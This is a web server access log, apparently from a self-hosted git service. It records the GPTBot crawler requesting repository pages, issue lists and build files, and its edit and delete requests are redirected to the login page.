git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:18:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15431] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:18:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11716] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" -[17/Feb/2026:18:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 11124] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15546] [Gzip 6.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10117] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13553] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:18:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&state=closed&type=all" -[17/Feb/2026:18:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:33:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:18:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:18:34:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:34:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:18:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:18:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11234] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:18:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 914] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:18:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13822] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 921] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13573] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15122] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13730] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11269] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:34:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13539] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12809] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15373] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:34:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py?display=rendered" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:18:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:18:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr 